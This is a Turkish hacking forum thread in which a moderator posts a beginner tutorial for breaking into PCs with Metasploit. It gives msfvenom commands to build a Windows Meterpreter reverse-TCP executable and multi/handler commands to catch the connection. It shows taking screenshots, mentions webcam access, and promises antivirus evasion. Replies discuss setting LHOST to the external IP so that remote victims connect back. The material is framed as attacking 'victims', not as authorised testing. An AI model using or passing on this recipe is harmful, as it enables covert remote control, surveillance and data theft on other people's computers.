İPUCU

Linux Linux İle İlgili Bilgi Paylaşım Platformu

Seçenekler

[BAŞLANGIÇ] Met@Sploit ile PCLERE SIZMA! | Hé-ll

Hé-ll - ait Kullanıcı Resmi (Avatar)
Moderatör
Üyelik tarihi:
09/2018
Nereden:
Darkness
Mesajlar:
1.895
Konular:
333
Teşekkür (Etti):
602
Teşekkür (Aldı):
290
Ticaret:
(0) %
01-08-2019 20:56
#1
[BAŞLANGIÇ] Met@Sploit ile PCLERE SIZMA! | Hé-ll



Merhaba dostlar, ben Hé-ll


Bugün sizlere met@spolit ile bilgisayara sızma, bilgi toplama - screenshot alma - webcam açtırmayı v.s. göstereceğim. Başlangıç seviyesine uygun yaptım. Herkesin anlayacağı şekilde ilerleyeceğim. Bu konumda encoder'dan bahsetmedim çünkü artık virüstotal v.s. siteler encoder'ı kolayca bulabiliyor. Bir dahaki konumda bulamamalarını sağlayan programlardan v.s. bahsedeceğim. Şimdiden hayırlı olsun.






Öncelikle MET@SPLOİT Nedir?


Met@sploit, çeşitli pentestler gerçekleştirmek için içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu framework altyapısıdır.
Met@sploit; Linux, Windows Mac-OS ortamlarında çalışabilmektedir.


Met@sploiti de açıkladığımıza göre konumuza geçebiliriz.





1- Met@sploit Konsulumuzu Açıyoruz


Kod:
msfconsole







2- Bir terminal daha açıyoruz ve aşağıdaki msfvenom kodumuzu yapıştırıyoruz. Bu kodda ben rastgele bir payload kullandım. Siz başka bir payload kullanabilirsiniz. Ayrıca konunun en sonuna bazı notlar bırakıcam. Onları okuyarak bilgi sahibi olabilirsiniz.

Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > Desktop/hell.exe








3-Şunu asla karıştırmayın. LHOST ve LPORT sizin kendi ip niz ve portunuzdur. RHOST ve RPORT karşıdaki kişinin portu ve ipsidir. Kodlarımızı yazarken karşıda kurbanı kendiniz kontrol edeceğiniz için kendi ip adresinizi yazmanız lazım. İp adresinizi öğrenmek için


Kod:
ifconfig








3-Kodumuzu yapıştırıyoruz ve bekliyoruz.







4-Programımız oluşturuldu. Masaüstüne gelip programı görebilirsiniz.






5- Şimdi sıra met@spolit konsolumuza geliyoruz. Ve size verdiğim kodları yazıyorsunuz. Bu kodlar dediğim gibi LHOST ve LPORT sizin ip adresiniz ve portunuz tıklayan kişi sizin ip ve portunuza yönlendirilecek. O yüzden eksiklik yapmayın.


Kod:
use multi/handler ( KURBANI DİNLEMESİNİ EMREDİYORUZ )

set payload windows/meterpreter/reverse_tcp ( PROGRAMIMIZI BELİRTİYORUZ )

set lhost ( KENDİ İP ADRESİMİZ ) ( KURBAN KİME YÖNLENSİN? BİZİM İP ADRESİMİZE YÖNLENDİRECEĞİZ )

set lport ( BELİRTTİĞİMİZ PORT ) 

run ya da exploit ( BAŞLAT )








6- Ben kendim üzerinde göstericem, o yüzden programı kendim açıyorum. Linuxta .exe açılmadığı için wine ile destek alarak .exe yi terminalden açıyorum ve gördüğünüz gibi aşağıda met@sploit konsolumuza bildirim geliyor ve artık kullanıcının bilgisayarındayız.






7- Şimdi help yazarak kullanabileceğimiz komutları görebiliriz. Ben kendi pcm parrot olduğu için kendi pcme zarar vermemek istediğim için sadece screenshot komutunun kullanımını gösterdim. Help yazıp diğer komutları öğrenebilirsiniz.


Kod:
help







8- Komutumuzu kullanarak ekran görüntüsünü alıyoruz ve gördüğünüz gibi kaydedildi.

Kod:
screenshot







9- Gördüğünüz gibi dosyalarıma bir screenshot geldi.




Evet anlatımım bu kadardı. Aşağıda size bazı notlar vereceğim. Bu notlarımı kaydedin. İşinize yarayacaktır.







Kod:
RHOST = KARŞI TARAFIN İP ADRESİ
LHOST = KENDİ LOCAL İPMİZ
LPORT = LOCALDA ÖNEMLİ DEĞİL ANCAK DİNLERKEN DE LPORT KISMINA AYNI SAYI DEĞERİNİ YAZMAK GEREKİYOR.
ENCODER = ANTİVİRÜSÜN EXENİN İÇİNDEKİ KODLARI TESPİT ETMEMESİ İÇİN YAPILAN ŞİFRELEME TÜRÜDÜR. ANCAK ANTİVİRÜSLER BUNLARIN ALGORİTMASINI TESPİT ETTİĞİ İÇİN VİRÜS SAYFASINDAN 1 2 EKSİLİR.
RANK = ENCODER İN KULLANIŞI LOW,NORMAL,GREAT,EXCELLENT VS. ( EN İYİSİ EXCELLENT ' TİR. )
FAZLA ENCODER YAPILIRSA PAYLOAD'IN YAPISI BOZULABİLİR.
ARMİTAGE = MET@SPLOİTİN KULLANICI ARAYÜZÜ HALİNDE DAHA RAHAT AMA KONSOL DAHA İYİDİR, PC KASTIRMA YAPABİLİR ARMİTAGE. AYRICA ARMİTAGE AÇMAK İÇİN BAZI SERVİSLERİN AÇIK OLMASI GEREKİR ONLAR=
service postgresql start
service met@sploit start


TÜM KOMUTLAR & DİĞER BİLGİLER





Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > Desktop/hell.exe ( PROGRAM YAZMA )

msfconsole ( MET@SPLOİT KONSOLU )

use multi/handler ( KURBANI DİNLEMESİNİ EMREDİYORUZ )

set payload windows/meterpreter/reverse_tcp ( PROGRAMIMIZI BELİRTİYORUZ )

set lhost ( KENDİ İP ADRESİMİZ ) ( KURBAN KİME YÖNLENSİN? BİZİM İP ADRESİMİZE YÖNLENDİRECEĞİZ )

set lport ( BELİRTTİĞİMİZ PORT ) 

run ya da exploit ( BAŞLAT ) 

UYGULAMAYI AÇTIK DİYELİM ( LİNUXTA NASIL AÇICAZ SORUSUNUN CEVABI AŞAĞIDA ) 

cd Desktop/
wine hell.exe

MET@SPLOİT KONSOLUMUZA BİLDİRİM GELDİ.

Started reverse TCP handler on ( YAZDIĞIN İP ADRESİNE BİR YÖNELME VAR )
Sending stage (179779 bytes) ( KURBANIN İP ADRESİ )
Meterpreter session 1 opened ( 1 KİŞİ SİZE YÖNLENDİ )

ARDINDAN KOMUT SATIRI AÇILACAK

meterpreter> help YAZARAK BİLGİ ALABİLİRİZ












Kaynak : https://www.hackings.org/2012/06/ned...***sploit.html (MET@SPLOİT NEDİR)







ÖZEL TEŞEKKÜR



❤️ 𝓣𝓮𝓰𝓲𝓷 ❤️
---------------------
PALA
Liserjik
"Ben bir Türk'üm, dinim cinsim uludur!..."
Stajyer Asistan Kulübü



Konu Hé-ll tarafından (01-08-2019 21:03 Saat 21:03 ) değiştirilmiştir.
cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Yaş:
24
Mesajlar:
2.768
Konular:
178
Teşekkür (Etti):
0
Teşekkür (Aldı):
756
Ticaret:
(0) %
01-08-2019 23:00
#2
Arkadaslar karisdiracakdir msfevomda payload olusdurma zamani ifconfigden cikan ip mi yazilsin yoksa whats my ip den cikan ipmi yazilsin msfvenom hakkinda aciklayici yazsaydin daha guzel olurdu. Bu zorlu islemdir port acmadan taa ki sosial muhendisliye kadar bunu 2 sinde yapsaydin bide video cekseydin inan konu gozel olacakdi windows yok orasi malum amma bir linuksun icerisine vmware yukleyip oylede deneye bilirdin biraz aceleye gitmis konu resmler eklemissin bu guzel ellerine sagliq
Hé-ll - ait Kullanıcı Resmi (Avatar)
Moderatör
Üyelik tarihi:
09/2018
Nereden:
Darkness
Mesajlar:
1.895
Konular:
333
Teşekkür (Etti):
602
Teşekkür (Aldı):
290
Ticaret:
(0) %
01-08-2019 23:18
#3
Alıntı:
cewl´isimli üyeden Alıntı Mesajı göster
Arkadaslar karisdiracakdir msfevomda payload olusdurma zamani ifconfigden cikan ip mi yazilsin yoksa whats my ip den cikan ipmi yazilsin msfvenom hakkinda aciklayici yazsaydin daha guzel olurdu. Bu zorlu islemdir port acmadan taa ki sosial muhendisliye kadar bunu 2 sinde yapsaydin bide video cekseydin inan konu gozel olacakdi windows yok orasi malum amma bir linuksun icerisine vmware yukleyip oylede deneye bilirdin biraz aceleye gitmis konu resmler eklemissin bu guzel ellerine sagliq

Orada herşey detaylı detaylı anlatılmıştır neyi nereye yazacakları vesayre. Teşekkürler.
---------------------
PALA
Liserjik
"Ben bir Türk'üm, dinim cinsim uludur!..."
Stajyer Asistan Kulübü



cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Yaş:
24
Mesajlar:
2.768
Konular:
178
Teşekkür (Etti):
0
Teşekkür (Aldı):
756
Ticaret:
(0) %
01-08-2019 23:29
#4
Qardas konunu 2 ci defa inceledim konunda eksikler var zahmet cekmisin konu acmisin soyliyormki onuda anlatsaydin iyi olurdu sirf 1 hafta icerisinde 2 konu aclmalidi deye aceleye gitmesin eksiklikler vardir
Hé-ll - ait Kullanıcı Resmi (Avatar)
Moderatör
Üyelik tarihi:
09/2018
Nereden:
Darkness
Mesajlar:
1.895
Konular:
333
Teşekkür (Etti):
602
Teşekkür (Aldı):
290
Ticaret:
(0) %
01-08-2019 23:42
#5
Alıntı:
cewl´isimli üyeden Alıntı Mesajı göster
Qardas konunu 2 ci defa inceledim konunda eksikler var zahmet cekmisin konu acmisin soyliyormki onuda anlatsaydin iyi olurdu sirf 1 hafta icerisinde 2 konu aclmalidi deye aceleye gitmesin eksiklikler vardir

3-Şunu asla karıştırmayın. LHOST ve LPORT sizin kendi ip niz ve portunuzdur. RHOST ve RPORT karşıdaki kişinin portu ve ipsidir. Kodlarımızı yazarken karşıda kurbanı kendiniz kontrol edeceğiniz için kendi ip adresinizi yazmanız lazım. İp adresinizi öğrenmek için


Ve konun altına ip adresi nasıl bulunur diye "RESİM" bıraktım. Daha ne kadar açıklayıcı olabilirim ? Konuyu incelemeden yorum yapmayın.
---------------------
PALA
Liserjik
"Ben bir Türk'üm, dinim cinsim uludur!..."
Stajyer Asistan Kulübü



cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Yaş:
24
Mesajlar:
2.768
Konular:
178
Teşekkür (Etti):
0
Teşekkür (Aldı):
756
Ticaret:
(0) %
02-08-2019 00:04
#6
Alıntı:
Hé-ll´isimli üyeden Alıntı Mesajı göster
3-Şunu asla karıştırmayın. LHOST ve LPORT sizin kendi ip niz ve portunuzdur. RHOST ve RPORT karşıdaki kişinin portu ve ipsidir. Kodlarımızı yazarken karşıda kurbanı kendiniz kontrol edeceğiniz için kendi ip adresinizi yazmanız lazım. İp adresinizi öğrenmek için


Ve konun altına ip adresi nasıl bulunur diye "RESİM" bıraktım. Daha ne kadar açıklayıcı olabilirim ? Konuyu incelemeden yorum yapmayın.
Qardas sen meni anlamirsan yadaki anliyorsun amma anlamiyorsun gibi haraket edyorsun yazmissinki lhost lport sizin kendi ip niz gel sana anlatym afrikadaki bilgisayara sizmak isdiyorsun ne yapacaksin ? Lhost ve lport kismina ne yazacaksin ? Kendi ip-zi? Mafevom -p windows meterpreter reverse tcp lhost=kendi ip ? Lport = kendi portmuz ? Terminaldan cikan ifconfigden cikan ip mettasploite whats my ip den cikan ip se lhost="ip" msfvenomda ben linuksu iyi bilerim ve konuda drek payload olusdurup konuya kecmisin aslinda dis ag icin yaplanlarida yazmali idin herkes kendi pc sin hekleyesi diyil senin gibi

Eğer uzaktan bağlantı alacaksanız (aynı ağda değilseniz) LHOST kısmına dış ip adresinizi (internete çıkış yaptığınız ip adresinizi) yazacaksınız.
Konu cewl tarafından (02-08-2019 00:10 Saat 00:10 ) değiştirilmiştir.
Hé-ll - ait Kullanıcı Resmi (Avatar)
Moderatör
Üyelik tarihi:
09/2018
Nereden:
Darkness
Mesajlar:
1.895
Konular:
333
Teşekkür (Etti):
602
Teşekkür (Aldı):
290
Ticaret:
(0) %
02-08-2019 00:10
#7
Alıntı:
cewl´isimli üyeden Alıntı Mesajı göster
Qardas sen meni anlamirsan yadaki anliyorsun amma anlamiyorsun gibi haraket edyorsun yazmissinki lhost lport sizin kendi ip niz gel sana anlatym afrikadaki bilgisayara sizmak isdiyorsun ne yapacaksin ? Lhost ve lport kismina ne yazacaksin ? Kendi ip-zi? Mafevom -p windows meterpreter reverse tcp lhost=kendi ip ? Lport = kendi ip ? Terminaldan cikan ifconfigden cikan ip mettasploite whats my ip den cikan ip se lhost="ip" msfvenomda ben linuksu iyi bilerim ve konuda drek payload olusdurup konuya kecmisin aslinda dis ag icin yaplanlarida yazmali idin herkes kendi pc sin hekleyesi diyil senin gibi

Eğer uzaktan bağlantı alacaksanız (aynı ağda değilseniz) LHOST kısmına dış ip adresinizi (internete çıkış yaptığınız ip adresinizi) yazacaksınız.

Tamam dostum sen bildiğin gibi devam. Kolay gelsin.
---------------------
PALA
Liserjik
"Ben bir Türk'üm, dinim cinsim uludur!..."
Stajyer Asistan Kulübü



cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Yaş:
24
Mesajlar:
2.768
Konular:
178
Teşekkür (Etti):
0
Teşekkür (Aldı):
756
Ticaret:
(0) %
02-08-2019 00:21
#8
Hz.Ali(e) demiski mene 1 herif oyredenin 40 il kolesi (qulu) olaram
Sadece bi elesdiri neden kiziyorsunki canm benm hic kimse ideal diyildir ici ben karisik
Hé-ll - ait Kullanıcı Resmi (Avatar)
Moderatör
Üyelik tarihi:
09/2018
Nereden:
Darkness
Mesajlar:
1.895
Konular:
333
Teşekkür (Etti):
602
Teşekkür (Aldı):
290
Ticaret:
(0) %
02-08-2019 00:26
#9
Alıntı:
cewl´isimli üyeden Alıntı Mesajı göster
Hz.Ali(e) demiski mene 1 herif oyredenin 40 il kolesi (qulu) olaram
Sadece bi elesdiri neden kiziyorsunki canm benm hic kimse ideal diyildir ici ben karisik
Yav kızmadım o nerden çıktı sadece bildiğini yap dedim neyse uzatmayalım dediğin gibi olsun. Kolay gelsin.
---------------------
PALA
Liserjik
"Ben bir Türk'üm, dinim cinsim uludur!..."
Stajyer Asistan Kulübü



"PurpposoLes - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
DataBase
Mesajlar:
3.260
Konular:
263
Teşekkür (Etti):
915
Teşekkür (Aldı):
1070
Ticaret:
(0) %
3 Hafta önce
#10
Alıntı:
cewl´isimli üyeden Alıntı Mesajı göster
Eğer uzaktan bağlantı alacaksanız (aynı ağda değilseniz) LHOST kısmına dış ip adresinizi (internete çıkış yaptığınız ip adresinizi) yazacaksınız.
@cewl haklı @Hè-ll dış ağa saldırı yapmak istiyorsak ip adresi yazılması lazım. (Terminal'e ifconfig yazarsan local host bağlantısı için ip adresi verir. Kurbanımız aynı ağda olmayacağı için dış ip adresi girilmesi gerek) Sizin anlattığınız local host da işe yarar ama dış ağda hiçbir işe yaramaz. Lütfen eksikleri giderelim güzel konu.
---------------------
ɱყ ŋąɱɛ ıʂ "℘ųཞ℘℘ơʂơƖɛʂ
ı'ɱ ą ცƖąƈƙ ɧąɬ

Öʅüɱʂüȥ αşƙʅαɾ ʋαɾԃα, öʅɱҽყҽɳ αşıƙ ʋαɾ ɱı?

єѕкι αηкα тιмι αѕιѕтαηı..

@the_purpp
Konu "PurpposoLes tarafından ( 3 Hafta önce Saat 12:04 ) değiştirilmiştir.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı